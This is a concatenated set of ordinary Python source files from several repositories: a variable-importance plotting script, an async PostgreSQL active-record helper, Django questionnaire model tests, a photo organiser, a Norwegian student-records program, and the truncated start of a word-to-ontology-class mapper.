model.predict(X_permute)\r\n\r\nr_normal = np.corrcoef(y_true, y_hat_normal.flatten())\r\nr_permute = np.corrcoef(y_true, y_hat_permute.flatten())\r\n\r\n#calculate vi\r\nvi_price = r_normal[0,1] - r_permute[0,1]\r\nvi_price\r\n\r\n#category\r\npricing = pd.read_csv('pricing_test.csv', names = ['sku','price','quantity',\r\n 'order', 'duration', 'category'])\r\n\r\n\r\n\r\npricing = pricing.drop(['sku'], axis = 1)\r\n\r\n\r\npricing['quantity'] = (pricing['quantity'] - ranges['min_quantity'][0]) / ranges['range_quantity'][0]\r\npricing['duration'] = (pricing['duration'] - ranges['min_duration'][0]) / ranges['range_duration'][0]\r\npricing['order'] = (pricing['order'] - ranges['min_order'][0]) / ranges['range_order'][0]\r\npricing['price'] = (pricing['price'] - ranges['min_price'][0]) / ranges['range_price'][0]\r\n\r\n\r\ny_true = pricing['quantity'].to_numpy()\r\n\r\npricing = pricing.drop(['quantity'],axis = 1)\r\n\r\n\r\n\r\n\r\ncategory_types = pd.CategoricalDtype(categories = sorted(df_category['category_levels'][:]), ordered = True)\r\npricing_normal = copy.copy(pricing)\r\n\r\npricing_normal['category'] = pricing_normal['category'].astype(category_types)\r\n\r\n\r\npricing_normal = pd.get_dummies(pricing_normal, ['category'])\r\n\r\nX_normal = pricing_normal.to_numpy()\r\n\r\npricing_permute = copy.copy(pricing)\r\n\r\npricing_permute['category'] = np.random.permutation(pricing_permute['category'])\r\npricing_permute['category'] = pricing_permute['category'].astype(category_types)\r\n\r\n\r\npricing_permute = pd.get_dummies(pricing_permute, ['category'])\r\n\r\nX_permute = pricing_permute.to_numpy()\r\n\r\n\r\n\r\ny_hat_normal = model.predict(X_normal)\r\n\r\ny_hat_permute = model.predict(X_permute)\r\n\r\nr_normal = np.corrcoef(y_true, y_hat_normal.flatten())\r\nr_permute = np.corrcoef(y_true, y_hat_permute.flatten())\r\n\r\n\r\nvi_category = r_normal[0,1] - r_permute[0,1]\r\nvi_category\r\n\r\nvi = [vi_duration, vi_price, vi_category, vi_order]\r\n\r\nvi\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.bar(x = ['duration', 'price', 'category', 'order'],\r\n height = vi)\r\n\r\nplt.title('Variable Importance Measures for Each Variable')\r\nplt.xlabel('Variable')\r\nplt.ylabel('Importance')\r\nplt.show()\r\n","repo_name":"LHu13/BZAN554.1","sub_path":"viplots.py","file_name":"viplots.py","file_ext":"py","file_size_in_byte":8525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34252898926","text":"\nfrom tornado import gen\nfrom database import DatabaseMixin\n\n\ndef yieldme(fn):\n def wrapper(*args, **kwargs):\n return gen.Task(fn, *args, **kwargs)\n return wrapper\n\n\nclass PGActiveRecord(dict, DatabaseMixin):\n table_name = ''\n primary_key = 'id'\n\n def data_callback_fetch(self, c, e, callback):\n if e:\n raise e\n\n row = self.fetch_row(c)\n if row:\n for k, v in row.iteritems():\n self[k] = v\n callback(self)\n else:\n callback(None)\n\n def data_callback_modify(self, c, e, callback):\n \"\"\"After insert return inserted id or count query\"\"\"\n if e:\n raise e\n\n if c.description:\n row = c.fetchone()\n callback(row[0])\n else:\n callback(None)\n\n def _impl_insert(self, callback):\n f = []\n v = []\n values = []\n for k in self.keys():\n f.append(k)\n v.append('%s')\n values.append(self[k])\n\n sql = 'INSERT INTO %s (%s) VALUES (%s) RETURNING %s' % (\n self.table_name,\n ', '.join(f),\n ', '.join(v),\n self.primary_key\n )\n self.db.execute(sql, values, callback=lambda x, e: self.data_callback_modify(x, e, 
callback))\n\n def _impl_update(self, callback):\n pairs = []\n values = []\n for k in self.keys():\n pairs.append('%s = %%s' % k)\n values.append(self[k])\n values.append(self[self.primary_key])\n\n sql = 'UPDATE %s SET %s WHERE %s = %%s' % (self.table_name, ', '.join(pairs), self.primary_key)\n self.db.execute(sql, values, callback=lambda x, e: self.data_callback_modify(x, e, callback))\n\n @classmethod\n @yieldme\n def fetch(cls, _id, **kwargs):\n callback = kwargs.pop('callback')\n _self = cls()\n _self.db.execute(\n 'SELECT * FROM %s WHERE id = %%s' % _self.table_name, [_id],\n callback=lambda x, e: _self.data_callback_fetch(x, e, callback)\n )\n\n @classmethod\n @yieldme\n def find_one(cls, condition, condvars=[], **kwargs):\n callback = kwargs.pop('callback')\n _self = cls()\n _self.db.execute(\n 'SELECT * FROM %s WHERE %s LIMIT 1' % (_self.table_name, condition), condvars,\n callback=lambda x, e: _self.data_callback_fetch(x, e, callback)\n )\n\n @yieldme\n def save(self, **kwargs):\n callback = kwargs.pop('callback')\n\n if self.primary_key in self.keys() and self[self.primary_key]:\n self._impl_update(callback)\n else:\n self._impl_insert(callback)\n\n @yieldme\n def pg_insert(self, **kwargs):\n callback = kwargs.pop('callback')\n self._impl_insert(callback)\n\n @yieldme\n def pg_update(self, **kwargs):\n callback = kwargs.pop('callback')\n self._impl_update(callback)\n\n @yieldme\n def pg_delete(self, _id, **kwargs):\n callback = kwargs.pop('callback')\n sql = 'DELETE FROM %s WHERE %s = %%s' % (self.table_name, self.primary_key)\n self.db.execute(sql, [_id], callback=lambda x, e: self.data_callback_modify(x, e, callback))\n\n @classmethod\n @yieldme\n def pg_del_condition(cls, condition=None, condvars=[], **kwargs):\n callback = kwargs.pop('callback')\n sql = 'DELETE FROM %s' % cls.table_name\n if condition:\n sql = sql + ' WHERE ' + condition\n _self = cls()\n _self.db.execute(sql, condvars, callback=lambda x, e: _self.data_callback_modify(x, e, callback))\n\n @classmethod\n @yieldme\n def pg_rows_count(cls, condition=None, condvars=[], **kwargs):\n callback = kwargs.pop('callback')\n sql = 'SELECT COUNT(*) FROM %s' % cls.table_name\n if condition:\n sql = sql + ' WHERE ' + condition\n _self = cls()\n _self.db.execute(sql, condvars, callback=lambda x, e: _self.data_callback_modify(x, e, callback))\n\n\nclass PGRowset(list, DatabaseMixin):\n\n def __init__(self, table, **kwargs):\n self.table_name = table\n self._fields = kwargs.get('fields', ['*'])\n self._maxitems = kwargs.get('maxitems')\n self._offset = kwargs.get('offset', 0)\n self._condition = kwargs.get('condition', '')\n self._condvars = kwargs.get('condvars', [])\n self._orderby = kwargs.get('orderby', '')\n\n def set(self, **kwargs):\n k = kwargs.keys()\n if 'fields' in k:\n self._fields = kwargs['fields']\n if 'maxitems' in k:\n self._maxitems = kwargs['maxitems']\n if 'offset' in k:\n self._offset = kwargs['offset']\n if 'condition' in k:\n self._condition = kwargs['condition']\n if 'condvars' in k:\n self._condvars = kwargs['condvars']\n if 'orderby' in k:\n self._orderby = kwargs['orderby']\n\n @yieldme\n def pg_load(self, **kw):\n callback = kw.pop('callback')\n sql = ['SELECT', ', '.join(self._fields), 'FROM', self.table_name]\n\n if len(self._condition) > 0:\n sql.append('WHERE')\n sql.append(self._condition)\n\n if len(self._orderby) > 0:\n sql.append('ORDER BY')\n sql.append(self._orderby)\n\n if self._maxitems:\n sql.append('LIMIT')\n sql.append(str(self._maxitems))\n\n if self._offset:\n 
sql.append('OFFSET')\n sql.append(str(self._offset))\n self.db.execute(' '.join(sql), self._condvars, callback=lambda x, e: self.data_callback_load(x, e, callback))\n\n def data_callback_load(self, c, e, callback):\n if e:\n raise e\n\n colms = [d[0] for d in c.description]\n\n r = c.fetchone()\n while r:\n row = {}\n for i, column in enumerate(colms):\n try_decode = lambda _v: _v.decode('utf-8') if isinstance(_v, str) else _v\n\n if isinstance(r[i], list):\n row[column] = []\n for x in r[i]:\n row[column].append(try_decode(x))\n else:\n row[column] = try_decode(r[i])\n\n self.append(row)\n r = c.fetchone()\n\n callback(self)\n","repo_name":"rinatous/pg-async-crud","sub_path":"pgar.py","file_name":"pgar.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15622989194","text":"from django.db import models\nfrom django.db import IntegrityError\n\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom django.test import TestCase\n\nfrom nose import tools as nt\n\nfrom domande.models import TextQuestion, ChoiceQuestion, Choice\nfrom domande.models import TextAnswer, ChoiceAnswer\nfrom domande.models import Question\n\nfrom .models import DummyModel, DummyMember\n\nfrom .utils import BaseTest\n\n\nclass DomandeModelTests(BaseTest):\n\n def test_text_questions(self):\n '''Create a bunch of text questions'''\n\n question_texts = [\n 'How much wood can a woodchuck chuck?',\n 'What is the meaning of life'\n ]\n\n for i, text in enumerate(question_texts):\n t = TextQuestion.objects.create(order=i,\n text=text)\n self.dummy.questions.add(t)\n\n sorted([question.text for question in self.dummy.questions.all()])\n\n questions = self.dummy.questions.all()\n nt.eq_(questions.count(), 2)\n\n\nclass DemoCompQuestion(BaseTest):\n\n def test_road_week8(self):\n ''' Test the db structure by using some sample data'''\n\n choice_label_text = [\n 'Certified dolphin-safe',\n 'Cooked to perfection',\n 'High in quality protein',\n 'Delicous',\n 'Responsibly caught by the pole & line',\n 'Greenpeace endorsed fishing-practices',\n 'Natural source of omega-3s',\n 'All of the above!'\n ]\n\n choices = [Choice.objects.create(order=i, label=label)\\\n for i, label in enumerate(choice_label_text)]\n\n choice_question = ChoiceQuestion.objects.create(multichoice=True,\n text=\"Why do we love safcol tuna?\")\n\n self.dummy.questions.add(choice_question)\n\n choice_question.choices = choices\n choice = choice_question.choices.filter(label__icontains='protein')\n nt.eq_(choice.count(), 1)\n nt.eq_(choice.all()[0].order, 2)\n\n text_question = TextQuestion.objects.create(order=1,\n text='How much wood can a woodchuck chuck?')\n\n self.dummy.questions.add(text_question)\n\n # we created two questions so we should get 2 back\n nt.eq_(self.dummy.questions.all().count(), 2)\n\n\nclass TestAnswerModels(BaseTest):\n\n def test_text_answer(self):\n '''\n Test that the reverse GenericRelation works\n '''\n\n text_question = TextQuestion.objects.create(order=1,\n text='How much wood can a woodchuck chuck?')\n\n for i in range(2):\n # answer belongs to member\n answer = TextAnswer.objects.create(\n question=text_question,\n answer=\"4%d woods\" %i,\n content_object=self.member,\n )\n\n nt.eq_(self.member.answers.count(), 2)\n\n # Test that we can get the answer object\n nt.eq_(self.member.answers.all()[1], answer)\n\n # Test the we can get the question from answer\n nt.eq_(self.member.answers.all()[1].question, 
text_question)\n\n\n def test_choice_answer(self):\n '''\n Test Choice answers\n '''\n\n choices = [Choice.objects.create(label=t) for t in ('42', '43', '45')]\n\n choice_question = ChoiceQuestion.objects.create(\n text='What is the meaning of life?'\n )\n\n choice_question.choices = choices\n\n choice_answer = ChoiceAnswer.objects.create(\n question=choice_question,\n content_object=self.member,\n )\n\n choice_answer.answer = choices[:2]\n\n # Test that we can get the answer object\n nt.eq_(self.member.answers.count(), 1)\n\n # Test that we can find same Choices that was 'selected'\n nt.eq_(set(choices[:2]), set(self.member.answers.all()[0].answer.all()))\n\n # The second member shouldnt have any answers\n nt.eq_(self.member2.answers.count(), 0)\n\n\ndef test_question_unicode():\n q = Question.objects.create(text='lol')\n nt.eq_(unicode(q), 'lol')\n","repo_name":"bulkan/django-domande","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"9464038009","text":"import os\r\nfrom datetime import datetime\r\nfrom PIL import Image\r\nimport shutil\r\n\r\ndef pasta_para_fotos(file):\r\n data = data_foto_tirada(file)\r\n return data.strftime(f'%Y/{data.strftime(\"%Y-%m-%d\")}')\r\n\r\ndef data_foto_tirada(file):\r\n foto = Image.open(file)\r\n info = foto._getexif()\r\n if 36867 in info:\r\n data = info[36867]\r\n data = datetime.strptime(data, '%Y:%m:%d %H:%M:%S')\r\n else:\r\n data = datetime.fromtimestamp(os.path.getmtime(file))\r\n return data\r\n\r\ndef mover_fotos(file):\r\n novaPasta = pasta_para_fotos(file)\r\n if not os.path.exists(novaPasta):\r\n os.makedirs(novaPasta)\r\n shutil.move(file, novaPasta + '/' + file)\r\n\r\nprint(mover_fotos('foto_exemplo.jpg'))\r\n","repo_name":"jeffsouza01/Projeto_OrganizadorDeFotos","sub_path":"organiza_fotos.py","file_name":"organiza_fotos.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19464064584","text":"import argparse\nimport json\nimport os\n\nimport astropandas as apd\nimport numpy as np\nimport pandas as pd\n\nfrom . import Keys\nfrom .logger import logger\n\n\nerror_suffix = \"_err\"\n\n\nclass DumpAction(argparse.Action):\n\n def __call__(self, parser, namespace, values, option_string=None):\n default = json.dumps({\n \"filter_name (e.g. 
'r')\": {\n \"outname\": \"# output column name (suffix appended for \"\n f\"errors: {error_suffix})\",\n \"flux\": \"# name of colum with flux\",\n \"error\": \"# name of column with flux error\",\n \"magnitude\": \"# name of column with magnitudes (value ignored \"\n \"if --zeropoint is given)\",\n }\n }, indent=4)\n print(default)\n parser.exit()\n\n\nclass LoadConfig:\n\n def __init__(self, args):\n self.verbose = args.verbose\n # get the commandline arguments\n self.infile = args.infile\n self.hdu = args.hdu\n self.outfile = args.outfile\n self.fields = args.fields\n # read the configuration file\n logger.info(f\"reading configuration from {args.config}\")\n with open(args.config) as f:\n data = json.load(f)\n self.filters = list(data.keys())\n self.outname = {\n fname: config[\"outname\"] for fname, config in data.items()}\n self.flux = {\n fname: config[\"flux\"] for fname, config in data.items()}\n self.error = {\n fname: config[\"error\"] for fname, config in data.items()}\n self.magnitude = {\n fname: config[\"magnitude\"] for fname, config in data.items()}\n self._config = data # store for later use\n self.zeropoint = None # default, overwritten by subclasses\n\n def get(self, filter_name, key):\n return self._config[filter_name][key]\n\n def set(self, filter_name, key, value):\n self._config[filter_name][key] = value\n\n def load_input(self):\n logger.info(f\"reading data from {self.infile}\")\n try:\n return apd.read_auto(self.infile, hdu=self.hdu)\n except TypeError:\n return apd.read_auto(self.infile)\n\n def get_fields(self, df):\n try:\n if self.fields is None:\n return np.zeros(len(df), dtype=np.float)\n else:\n return df[self.fields].to_numpy()\n except KeyError as e:\n raise KeyError(f\"fields column {e} not found\")\n\n def get_fluxes(self, df):\n try:\n return {key: df[val] for key, val in self.flux.items()}\n except KeyError as e:\n raise KeyError(f\"flux column {e} not found\")\n\n def get_errors(self, df):\n try:\n return {key: df[val] for key, val in self.error.items()}\n except KeyError as e:\n raise KeyError(f\"flux error column {e} not found\")\n\n def get_magnitudes(self, df):\n try:\n if self.zeropoint is None:\n return {key: df[val] for key, val in self.magnitude.items()}\n else:\n return None\n except KeyError as e:\n raise KeyError(f\"magnitude column {e} not found\")\n\n def verify_filters(self, df_with_filter_col):\n df_filters = set(\n df_with_filter_col.index.get_level_values(Keys.filter).unique())\n conf_filters = set(self.filters)\n if df_filters != conf_filters:\n message = \"filter set does not match the configuration file\"\n logger.error(message)\n raise ValueError(message)\n\n\nclass LoadConfigSmooting(LoadConfig):\n\n def __init__(self, args):\n super().__init__(args)\n # check the additional commandline arguments\n self.zeropoint = args.zeropoint\n if self.zeropoint is not None:\n self.magnitude = None\n self.adapt = args.adapt\n self.suffix = args.suffix\n self.adapt_file = args.adapt_file\n\n def KiDS_aware_colname(self, flux_col_name):\n if \"GAAP\" in flux_col_name:\n colname = flux_col_name.replace(\"GAAP\", \"GAAPadapt\")\n else:\n colname = flux_col_name + self.suffix\n return colname\n\n def add_column_and_update(self, data, values, filt, which):\n key = self.KiDS_aware_colname(self.get(filt, which))\n logger.info(f\"adding {which} column: {key}\")\n data[key] = values.astype(np.float32) # default 64 bit is overkill\n self.set(filt, which, key)\n\n def load_adapt(self):\n if self.adapt is not None:\n logger.info(f\"reading external 
statistics from {self.adapt}\")\n data = pd.read_csv(self.adapt, index_col=[Keys.filter, Keys.field])\n self.verify_filters(data)\n return data\n else:\n return None\n\n def write_output(self, data):\n if self.adapt_file is None:\n fpath = \"_adapted\".join(os.path.splitext(self.infile))\n else:\n fpath = self.adapt_file\n logger.info(f\"writing adapted table data to {fpath}\")\n apd.to_auto(data, fpath)\n\n def write_stats(self, data):\n logger.info(f\"writing statistics to {self.outfile}\")\n data.to_csv(self.outfile)\n\n\nclass LoadConfigMagnitudes(LoadConfig):\n\n def __init__(self, args):\n super().__init__(args)\n # check the additional commandline arguments\n self.stats = args.stats\n self.smoothing = args.smoothing\n self.b_global = args.b_global\n self.plot = args.plot\n\n def load_stats(self):\n logger.info(f\"reading statistics from {self.stats}\")\n data = pd.read_csv(self.stats, index_col=[Keys.filter, Keys.field])\n self.verify_filters(data)\n return data\n\n def load_smoothing(self):\n fpath = self.smoothing if self.smoothing is not None else self.stats\n logger.info(f\"reading statistics from {fpath}\")\n data = pd.read_csv(fpath, index_col=[Keys.filter, Keys.field])\n self.verify_filters(data)\n return data\n\n @staticmethod\n def KiDS_aware_error_colname(mag_col_name):\n if mag_col_name.startswith(\"HMAG_\"):\n error_colname = f\"HMAGERR_{mag_col_name[5:]}\"\n else:\n error_colname = mag_col_name + error_suffix\n return error_colname\n\n def write_output(self, data):\n logger.info(f\"writing table data to {self.outfile}\")\n apd.to_auto(data, self.outfile)\n","repo_name":"jlvdb/hyperbolic","sub_path":"hyperbolic/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":6450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16327185467","text":"# Trenger for \"fjerne og endre\" funksjonene\r\nimport os\r\n\r\ngyldigMenyvalg = [1, 2, 3, 4, 5]\r\nharValgt = False\r\nstudentFil = \"Student13.txt\"\r\nemneFil = \"Emne13.txt\"\r\nresultatFil = \"Eksamensresultat13.txt\"\r\nstudenter = []\r\nstudentInfo = []\r\nfinnes = False\r\nbrukerValg = input(\"Meny\\n1. Registrering\\n2. Sletting\\n3. Skriv ut karakterliste for student\\n4. Skriv ut sensurliste for emne\\n5. Avslutt\\n\\n\")\r\nharValgt = False\r\nforsteGang = True\r\nslett = False\r\n\r\nregStudent = False\r\nregEmne = False\r\nregResultat = False\r\n\r\nfinnStudent = \"finnStudent\"\r\nfinnEmne = \"finnEmne\"\r\nfinnResultat = \"finnResultat\"\r\n\r\n# Registrer student\r\nstudNummer = 0\r\nstudFornavn = \"\"\r\nstudEtternavn = \"\"\r\nstudStudium = \"\"\r\n\r\n# Registrer emne\r\nemneKode = 0\r\nemneNavn = \"\"\r\n\r\n# Registrer eksamensresultat\r\nregEksamensresultatMeny = [\"\\n1. Registrer emnekode\", \"\\n2. Registrer studentnummer\", \"\\n3. Registrer karakter\"]\r\neksEmneKode = 0\r\neksStudNummer = 0\r\neksKarakter = \"\"\r\n\r\n\r\ndef valgMeny():\r\n global brukerValg\r\n global harValgt\r\n global regStudent\r\n global regEmne\r\n global regResultat\r\n global finnStudent\r\n global finnEmne\r\n global finnResultat\r\n global slett\r\n\r\n if (brukerValg == 1):\r\n harValgt = False\r\n gyldigMenyvalg = [1, 2, 3]\r\n \r\n while not (harValgt):\r\n registreringsValg = int(input(\"\\n1. Registrer student\\n2. Registrer emne\\n3. 
Registrer resultat\\n\\n\"))\r\n brukerValg = int(registreringsValg)\r\n for i in gyldigMenyvalg:\r\n if (i == brukerValg):\r\n harValgt = True\r\n \r\n if (brukerValg == 1): #Registrer student\r\n studNummer = int(input(\"\\n1. Registrer studentnummer\\n\"))\r\n studFornavn = input(\"\\n2. Registrer fornavn\\n\")\r\n studEtternavn = input(\"\\n3. Registrer etternavn\\n\")\r\n studStudium = input(\"\\n4. Registrer studium\\n\")\r\n studentInfo = [studNummer, studFornavn, studEtternavn, studStudium]\r\n regEmne = False\r\n regResultat = False\r\n regStudent = True\r\n objektInfo = [finnStudent, studNummer]\r\n if (not finnesFraFor(objektInfo)):\r\n registrer(studentInfo)\r\n skrivMeny()\r\n else:\r\n print(\"\\n\\nStudenten finnes fra før. Kunne derfor ikke registrere data.\")\r\n skrivMeny()\r\n elif(brukerValg == 2): #Registrer emne\r\n emneKode = int(input(\"\\n1. Registrer emnekode\\n\"))\r\n emneNavn = input(\"\\n2. Registrer emnenavn\\n\")\r\n emneInfo = [emneKode, emneNavn]\r\n regResultat = False\r\n regStudent = False\r\n regEmne = True\r\n objektInfo = [finnEmne, emneKode]\r\n if (not finnesFraFor(objektInfo)):\r\n registrer(emneInfo)\r\n skrivMeny()\r\n else:\r\n print(\"\\n\\nEmne finnes fra før. Kunne derfor ikke registrere data.\")\r\n skrivMeny()\r\n elif(brukerValg == 3): #Registrer resultat\r\n emneKode = int(input(\"\\n1. Registrer emnekode\\n\"))\r\n studentNummer = int(input(\"\\n2. Registrer studentnummer\\n\"))\r\n karakter = input(\"\\n3. Registrer karakter\\n\")\r\n resultatInfo = [emneKode, studentNummer, karakter]\r\n regEmne = False\r\n regStudent = False\r\n regResultat = True\r\n slett = False\r\n objektInfo = [finnResultat, emneKode, studentNummer]\r\n if (not finnesFraFor(objektInfo)):\r\n registrer(resultatInfo)\r\n skrivMeny()\r\n else:\r\n print(\"\\n\\nResultatet finnes fra før. Kunne derfor ikke registrere data.\") \r\n skrivMeny()\r\n elif (brukerValg == 2): #Slett\r\n studentNummer = input(\"\\n1. Skriv inn studentnummer til studenten du vil slette\\n\")\r\n objektInfo = [finnResultat, studentNummer]\r\n slett = True\r\n if (not finnesFraFor(objektInfo)):\r\n slettStudent(studentNummer)\r\n slett = False\r\n skrivMeny()\r\n else:\r\n slett = False\r\n print(\"Studenten har eksamensresultater tilknyttet seg, og kan derfor ikke slettes\") \r\n skrivMeny()\r\n elif (brukerValg == 3):\r\n studentNummer = input(\"\\n1. Skriv inn studentnummer til studenten du vil se på karakterlisten for\\n\")\r\n skrivUtKarakterliste(studentNummer)\r\n skrivMeny()\r\n elif (brukerValg == 4):\r\n emneKode = input(\"\\n1. Skriv inn emnekode til studiet du vil se på sensurlisten for\\n\")\r\n skrivUtSensurliste(emneKode)\r\n skrivMeny()\r\n elif (brukerValg == 5):\r\n quit()\r\n\r\ndef skrivMeny():\r\n global harValgt\r\n global forsteGang\r\n global gyldigMenyvalg\r\n\r\n gyldigMenyvalg = [1, 2, 3, 4, 5]\r\n harValgt = False\r\n\r\n while not (harValgt):\r\n objektInfo = []\r\n global brukerValg\r\n if (not forsteGang):\r\n brukerValg = input(\"\\nMeny\\n1. Registrering\\n2. Sletting\\n3. Skriv ut karakterliste for student\\n4. Skriv ut sensurliste for emne\\n5. 
Avslutt\\n\\n\")\r\n brukerValg = int(brukerValg)\r\n for i in gyldigMenyvalg:\r\n if (i == brukerValg):\r\n harValgt = True\r\n forsteGang = False\r\n valgMeny()\r\n \r\n\r\ndef registrer(infoListe):\r\n global regStudent\r\n global regEmne\r\n global regResultat\r\n \r\n if (regStudent):\r\n studNummer = infoListe[0]\r\n studFornavn = infoListe[1]\r\n studEtternavn = infoListe[2]\r\n studium = infoListe[3]\r\n\r\n if os.path.isfile(studentFil): #Filen eksisterer fra før\r\n studentListe = open(studentFil, \"a\")\r\n else: #Finnes ikke fra før\r\n studentListe = open(studentFil, \"w+\")\r\n\r\n studentListe.write(str(studNummer) + \"\\n\")\r\n studentListe.write(str(studFornavn) + \"\\n\")\r\n studentListe.write(str(studEtternavn) + \"\\n\")\r\n studentListe.write(str(studium) + \"\\n\")\r\n\r\n studentListe.close()\r\n regStudent = False\r\n elif(regEmne):\r\n emneKode = infoListe[0]\r\n emneNavn = infoListe[1]\r\n if os.path.isfile(emneFil):\r\n emneListe = open(emneFil, \"a\")\r\n else:\r\n emneListe = open(emneFil, \"w+\")\r\n\r\n emneListe.write(str(emneKode) + \"\\n\")\r\n emneListe.write(str(emneNavn) + \"\\n\")\r\n\r\n emneListe.close()\r\n regEmne = False\r\n elif(regResultat):\r\n emneKode = infoListe[0]\r\n studentNummer = infoListe[1]\r\n karakter = infoListe[2]\r\n\r\n if os.path.isfile(resultatFil):\r\n resultatListe = open(resultatFil, \"a\")\r\n else: #Finnes ikke fra før\r\n resultatListe = open(resultatFil, \"w+\")\r\n \r\n resultatListe.write(str(emneKode) + \"\\n\")\r\n resultatListe.write(str(studentNummer) + \"\\n\")\r\n resultatListe.write(str(karakter) + \"\\n\")\r\n\r\n resultatListe.close()\r\n regResultat = False\r\n\r\n\r\ndef slettStudent(studentNummer):\r\n index = 0\r\n if os.path.isfile(studentFil): #Filen eksisterer fra før\r\n studentListe = [line.rstrip('\\n') for line in open(studentFil)]\r\n for student in studentListe:\r\n if (student == studentNummer):\r\n del studentListe[index + 3]\r\n del studentListe[index + 2]\r\n del studentListe[index + 1]\r\n del studentListe[index]\r\n index += 1\r\n \r\n studFil = open(studentFil, \"w\")\r\n studFil.write(\"\\n\".join(studentListe))\r\n studFil.write(\"\\n\")\r\n studFil.close()\r\n else:\r\n print(\"\\nFilen med studenter finnes ikke. 
Kan derfor ikke slette studenten.\\n\")\r\n \r\ndef skrivUtKarakterliste(studentNummer):\r\n studentListe = [line.rstrip('\\n') for line in open(studentFil)]\r\n resultatListe = [line.rstrip('\\n') for line in open(resultatFil)]\r\n index = 0\r\n for studentInfo in studentListe:\r\n if (studentInfo == studentNummer):\r\n print(\"\\n\")\r\n print(\"Studentnummer: \" + studentInfo)\r\n print(\"Fornavn: \" + studentListe[index + 1])\r\n print(\"Etternavn: \" + studentListe[index + 2])\r\n print(\"Studium: \" + studentListe[index + 3])\r\n index += 1\r\n\r\n j = 0\r\n funnet = False\r\n for resultatInfo in resultatListe:\r\n if (resultatInfo == studentNummer):\r\n if (not funnet):\r\n print(\"\\n\")\r\n print(\"Resultatliste for student med studentnummer: \" + studentNummer)\r\n funnet = True\r\n print(\"Emnekode: \" + resultatListe[j - 1])\r\n print(\"Eksamensresultat: \" + resultatListe[j + 1])\r\n j += 1\r\n\r\ndef skrivUtSensurliste(emneKode):\r\n studentListe = [line.rstrip('\\n') for line in open(studentFil)]\r\n resultatListe = [line.rstrip('\\n') for line in open(resultatFil)]\r\n emneListe = [line.rstrip('\\n') for line in open(emneFil)]\r\n alleStudenterIEmne = []\r\n\r\n index = 0\r\n for emne in emneListe:\r\n if (emne == emneKode):\r\n print(\"\\n\")\r\n print(\"Emnekode: \" + emne)\r\n print(\"Emnenavn: \" + emneListe[index + 1])\r\n index += 1\r\n\r\n index = 0\r\n for resultat in resultatListe:\r\n if (resultat == emneKode):\r\n print(resultat)\r\n alleStudenterIEmne.append(resultatListe[index + 1])\r\n alleStudenterIEmne.append(resultatListe[index + 2])\r\n index += 1\r\n\r\n i = 0\r\n j = 0\r\n funnet = False\r\n if (len(alleStudenterIEmne) > 0):\r\n for student in studentListe:\r\n for studentIEmne in alleStudenterIEmne:\r\n if (student == studentIEmne):\r\n if (not funnet):\r\n funnet = True\r\n print(\"\\n\")\r\n print(\"Alle studenter i emne: \\n\")\r\n print(\"Studentnummer: \" + studentListe[i])\r\n print(\"Fornavn: \" + studentListe[i + 1])\r\n print(\"Etternavn: \" + studentListe[i + 2])\r\n print(\"Studium: \" + studentListe[i + 3])\r\n print(\"Karakter: \" + alleStudenterIEmne[j + 1])\r\n print(\"\\n\")\r\n i += 4\r\n j += 2\r\n\r\n\r\ndef finnesFraFor(objektInfo):\r\n global finnStudent\r\n global finnEmne\r\n global finnResultat\r\n global finnes\r\n global slett\r\n\r\n finnes = False\r\n \r\n print(\"\\n\")\r\n if (objektInfo[0] == finnStudent and os.path.isfile(studentFil)):\r\n studentListe = [line.rstrip('\\n') for line in open(studentFil)]\r\n if (len(studentListe) > 0):\r\n for studentInfo in studentListe:\r\n if (studentInfo == str(objektInfo[1])):\r\n finnes = True\r\n objektInfo = []\r\n return finnes\r\n return False\r\n elif(objektInfo[0] == finnEmne and os.path.isfile(emneFil)):\r\n emneListe = [line.rstrip('\\n') for line in open(emneFil)]\r\n if (len(emneListe) > 0):\r\n for emneInfo in emneListe:\r\n if (str(emneInfo) == str(objektInfo[1])):\r\n finnes = True\r\n objektInfo = []\r\n return finnes\r\n return False\r\n elif(objektInfo[0] == finnResultat and os.path.isfile(resultatFil)):\r\n resultatListe = [line.rstrip('\\n') for line in open(resultatFil)]\r\n index = 0\r\n if (slett):\r\n for resultatInfo in resultatListe:\r\n if (resultatInfo == objektInfo[1]):\r\n finnes = True\r\n objektInfo = []\r\n slett = False\r\n return finnes\r\n slett = False\r\n return finnes\r\n else:\r\n if (len(resultatListe) > 0):\r\n for resultatInfo in resultatListe:\r\n if (str(resultatInfo) == str(objektInfo[1]) and str(resultatListe[index + 1]) == 
str(objektInfo[2])):\r\n finnes = True\r\n return finnes\r\n index += 1\r\n return False\r\n else:\r\n objektInfo = []\r\n return False\r\n\r\n\r\n\r\nskrivMeny()\r\n","repo_name":"MathiasGaptjern/Tidligere-oppgaver","sub_path":"PRG1000R-Oblig2-13.py","file_name":"PRG1000R-Oblig2-13.py","file_ext":"py","file_size_in_byte":12220,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74353398634","text":"\"\"\"\nHandles the projection between words and classes in the dataset.\n\"\"\"\nimport database\nimport query_creator\nimport wn_dictionary\nfrom nltk.corpus import wordnet as wn\n\n# Returns the class IRI for a name string like \"Restaurant\" or \"\" if no match has been found.\ndef get_class_name(entity_name) :\n\n # street is mapped wrong -> extra case here\n if (entity_name.lower() == \"street\") :\n return \"http://linkedgeodata.org/ontology/ResidentialHighway\"\n \n class_name = wn_dictionary.wn_lexicon.get(entity_name.title(), \"\")\n return class_name[1:-1]\n\n# Returns a classified synonym for a noun which is in the dataset.\ndef synonym(noun) :\n syns = synonyms(noun)\n keys = wn_dictionary.wn_lexicon.keys()\n name = \"\"\n for syn in syns :\n if (syn in keys) :\n name = syn\n break;\n \n if (name == \"\") :\n raise RuntimeError(\"No class found for '\" + noun + \"'\")\n \n return name.lower()\n \n\n# Returns 